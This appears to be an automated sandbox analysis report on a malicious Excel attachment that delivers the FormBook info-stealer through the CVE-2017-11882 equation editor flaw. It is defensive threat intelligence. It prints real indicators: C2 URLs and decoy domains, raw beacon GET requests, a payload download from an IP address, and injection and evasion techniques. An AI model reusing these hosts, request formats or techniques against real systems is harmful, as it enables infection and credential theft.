Windows Analysis Report oustanding 03082921.xlsx

Overview

General Information

Sample Name: oustanding 03082921.xlsx
Analysis ID: 458692
MD5: 643fc978b1f9e32668a88202a7091266
SHA1: ee970a6713bd017fd118a1eb54a237339c4fd579
SHA256: e3469b3d96e6316114395abe8caef91aa9ac9edac2d701c2d64981d3c0dfc5f0
Tags: Formbook, VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses netsh to modify the Windows network and firewall settings
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Found malware configuration
Source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}
Multi AV Scanner detection for domain / URL
Source: adultpeace.com Virustotal: Detection: 6%
Multi AV Scanner detection for submitted file
Source: oustanding 03082921.xlsx ReversingLabs: Detection: 26%
Yara detected FormBook
Source: Yara match File source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp, type: MEMORY
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\dun[1].exe Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 7.2.vbc.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: netsh.pdb source: vbc.exe, 00000007.00000002.2198845306.00000000004E9000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, netsh.exe

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 6_2_00409A40
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 6_2_00409A50
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 6_2_00409B42
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 6_2_00409B50
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop edi 7_2_00416282
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop ebx 7_2_00406A94
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4x nop then pop edi 9_2_00206282
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4x nop then pop ebx 9_2_001F6A95
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: www.cleanxcare.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 13.229.216.142:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 13.229.216.142:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 69MB

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.adultpeace.com/p2io/
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Tue, 03 Aug 2021 14:50:43 GMT Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7 Last-Modified: Tue, 03 Aug 2021 14:09:54 GMT ETag: "146600-5c8a83d6b91fb" Accept-Ranges: bytes Content-Length: 1336832 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /p2io/?dzuD7VXH=pxlxKDNxRow4YEfruB4Bv4ohCC0AYWvU81HhH938ZriMjSGbLHz+dxzd3d03S+kNJyuCfQ==&bzr8U=6lxL-0XX HTTP/1.1 Host: www.cleanxcare.com Connection: close Data Raw: 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET /p2io/?dzuD7VXH=L/l9chWXgd4NYCGd+vVro19pFM6JqqsPd4ppl3EKhtG9qh305X+esnK5qs3e0XUjSiRqvg==&bzr8U=6lxL-0XX HTTP/1.1 Host: www.iotcloud.technology Connection: close Data Raw: 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET /p2io/?dzuD7VXH=d2NgnqRXaD3590PSrSeXKrGILlrAeXd0mpzt/HUKTHCMsqjNpHqiPppP981n7+M4uf60sw==&bzr8U=6lxL-0XX HTTP/1.1 Host: www.micheldrake.com Connection: close Data Raw: 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET /p2io/?dzuD7VXH=WkKybY+BW5ZBczdH4hKPcEEM/Z4gp4PnllJ4lZDhA9T5haocRpsPFf0I2LnXqOHPzeGA4A==&bzr8U=6lxL-0XX HTTP/1.1 Host: www.ruhexuangou.com Connection: close Data Raw: 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET /p2io/?dzuD7VXH=4oufm6g8t9Bugn+4kDBWoA8I6Q2bNaX51teMhl/6i5f1woTl8Y4OhcGguchYpq40FyXh9g==&bzr8U=6lxL-0XX HTTP/1.1 Host: www.adultpeace.com Connection: close Data Raw: 00 00 00 00 00 00 00
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 192.0.78.25
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AUTOMATTICUS
Source: Joe Sandbox View ASN Name: LEASEWEB-USA-SFO-12US
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /www/dun.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 13.229.216.142 Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BC7AE3BD.emf
Source: unknown DNS traffic detected: queries for: www.cleanxcare.com
Source: explorer.exe, 00000008.00000000.2182647228.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 00000008.00000000.2182647228.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000008.00000000.2170747344.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000008.00000000.2169101352.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000008.00000000.2169101352.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000008.00000000.2161066027.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000008.00000000.2171247047.0000000004F30000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000008.00000000.2169101352.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000008.00000000.2170747344.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000008.00000000.2170747344.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000008.00000000.2169101352.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000008.00000000.2182647228.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000008.00000000.2161066027.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000008.00000000.2170747344.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000008.00000000.2169101352.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000008.00000000.2170747344.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000008.00000000.2166928921.00000000039F4000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000008.00000000.2178764759.000000000861C000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000008.00000000.2167152019.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\dun[1].exe
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 7_2_004181B0 NtCreateFile, 7_2_004181B0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00418260 NtReadFile, 7_2_00418260
Source: C:\Users\Public\vbc.exe Code function: 7_2_004182E0 NtClose, 7_2_004182E0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00418390 NtAllocateVirtualMemory, 7_2_00418390
Source: C:\Users\Public\vbc.exe Code function: 7_2_004182AC NtReadFile, 7_2_004182AC
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041838B NtAllocateVirtualMemory, 7_2_0041838B
Source: C:\Users\Public\vbc.exe Code function: 7_2_008C00C4 NtCreateFile,LdrInitializeThunk, 7_2_008C00C4
Source: C:\Users\Public\vbc.exe Code function: 7_2_008C0048 NtProtectVirtualMemory,LdrInitializeThunk, 7_2_008C0048
Source: C:\Users\Public\vbc.exe Code function: 7_2_008C0078 NtResumeThread,LdrInitializeThunk, 7_2_008C0078
Source: C:\Users\Public\vbc.exe Code function: 7_2_008C07AC NtCreateMutant,LdrInitializeThunk, 7_2_008C07AC
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BF9F0 NtClose,LdrInitializeThunk, 7_2_008BF9F0
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BF900 NtReadFile,LdrInitializeThunk, 7_2_008BF900
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_008BFAD0
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFAE8 NtQueryInformationProcess,LdrInitializeThunk, 7_2_008BFAE8
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFBB8 NtQueryInformationToken,LdrInitializeThunk, 7_2_008BFBB8
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFB68 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_008BFB68
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFC90 NtUnmapViewOfSection,LdrInitializeThunk, 7_2_008BFC90
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFC60 NtMapViewOfSection,LdrInitializeThunk, 7_2_008BFC60
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFD8C NtDelayExecution,LdrInitializeThunk, 7_2_008BFD8C
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFDC0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_008BFDC0
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFEA0 NtReadVirtualMemory,LdrInitializeThunk, 7_2_008BFEA0
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_008BFED0
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFFB4 NtCreateSection,LdrInitializeThunk, 7_2_008BFFB4
Source: C:\Users\Public\vbc.exe Code function: 7_2_008C10D0 NtOpenProcessToken, 7_2_008C10D0
Source: C:\Users\Public\vbc.exe Code function: 7_2_008C0060 NtQuerySection, 7_2_008C0060
Source: C:\Users\Public\vbc.exe Code function: 7_2_008C01D4 NtSetValueKey, 7_2_008C01D4
Source: C:\Users\Public\vbc.exe Code function: 7_2_008C010C NtOpenDirectoryObject, 7_2_008C010C
Source: C:\Users\Public\vbc.exe Code function: 7_2_008C1148 NtOpenThread, 7_2_008C1148
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BF8CC NtWaitForSingleObject, 7_2_008BF8CC
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BF938 NtWriteFile, 7_2_008BF938
Source: C:\Users\Public\vbc.exe Code function: 7_2_008C1930 NtSetContextThread, 7_2_008C1930
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFAB8 NtQueryValueKey, 7_2_008BFAB8
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFA20 NtQueryInformationFile, 7_2_008BFA20
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFA50 NtEnumerateValueKey, 7_2_008BFA50
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFBE8 NtQueryVirtualMemory, 7_2_008BFBE8
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFB50 NtCreateKey, 7_2_008BFB50
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFC30 NtOpenProcess, 7_2_008BFC30
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFC48 NtSetInformationFile, 7_2_008BFC48
Source: C:\Users\Public\vbc.exe Code function: 7_2_008C0C40 NtGetContextThread, 7_2_008C0C40
Source: C:\Users\Public\vbc.exe Code function: 7_2_008C1D80 NtSuspendThread, 7_2_008C1D80
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFD5C NtEnumerateKey, 7_2_008BFD5C
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFE24 NtWriteVirtualMemory, 7_2_008BFE24
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFFFC NtCreateProcessEx, 7_2_008BFFFC
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFF34 NtQueueApcThread, 7_2_008BFF34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_020400C4 NtCreateFile,LdrInitializeThunk, 9_2_020400C4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_020407AC NtCreateMutant,LdrInitializeThunk, 9_2_020407AC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FAE8 NtQueryInformationProcess,LdrInitializeThunk, 9_2_0203FAE8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FB50 NtCreateKey,LdrInitializeThunk, 9_2_0203FB50
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FB68 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_0203FB68
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FBB8 NtQueryInformationToken,LdrInitializeThunk, 9_2_0203FBB8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203F900 NtReadFile,LdrInitializeThunk, 9_2_0203F900
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203F9F0 NtClose,LdrInitializeThunk, 9_2_0203F9F0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 9_2_0203FED0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FFB4 NtCreateSection,LdrInitializeThunk, 9_2_0203FFB4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FC60 NtMapViewOfSection,LdrInitializeThunk, 9_2_0203FC60
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FD8C NtDelayExecution,LdrInitializeThunk, 9_2_0203FD8C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FDC0 NtQuerySystemInformation,LdrInitializeThunk, 9_2_0203FDC0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02040048 NtProtectVirtualMemory, 9_2_02040048
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02040060 NtQuerySection, 9_2_02040060
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02040078 NtResumeThread, 9_2_02040078
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_020410D0 NtOpenProcessToken, 9_2_020410D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0204010C NtOpenDirectoryObject, 9_2_0204010C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02041148 NtOpenThread, 9_2_02041148
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_020401D4 NtSetValueKey, 9_2_020401D4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FA20 NtQueryInformationFile, 9_2_0203FA20
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FA50 NtEnumerateValueKey, 9_2_0203FA50
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FAB8 NtQueryValueKey, 9_2_0203FAB8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FAD0 NtAllocateVirtualMemory, 9_2_0203FAD0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FBE8 NtQueryVirtualMemory, 9_2_0203FBE8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203F8CC NtWaitForSingleObject, 9_2_0203F8CC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02041930 NtSetContextThread, 9_2_02041930
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203F938 NtWriteFile, 9_2_0203F938
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FE24 NtWriteVirtualMemory, 9_2_0203FE24
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FEA0 NtReadVirtualMemory, 9_2_0203FEA0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FF34 NtQueueApcThread, 9_2_0203FF34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FFFC NtCreateProcessEx, 9_2_0203FFFC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FC30 NtOpenProcess, 9_2_0203FC30
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02040C40 NtGetContextThread, 9_2_02040C40
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FC48 NtSetInformationFile, 9_2_0203FC48
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FC90 NtUnmapViewOfSection, 9_2_0203FC90
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FD5C NtEnumerateKey, 9_2_0203FD5C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02041D80 NtSuspendThread, 9_2_02041D80
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_002081B0 NtCreateFile, 9_2_002081B0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_00208260 NtReadFile, 9_2_00208260
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_002082E0 NtClose, 9_2_002082E0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_002082AC NtReadFile, 9_2_002082AC
Detected potential crypto function
Found potential string decryption / allocating functions
Source: C:\Users\Public\vbc.exe Code function: String function: 008CE2A8 appears 38 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0093F970 appears 81 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00913F92 appears 106 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0091373B appears 238 times
Source: C:\Users\Public\vbc.exe Code function: String function: 008CDF5C appears 105 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 0204DF5C appears 107 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 02093F92 appears 108 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 0209373B appears 238 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 020BF970 appears 81 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 0204E2A8 appears 38 times
PE file contains strange resources
Source: dun[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Yara signature match
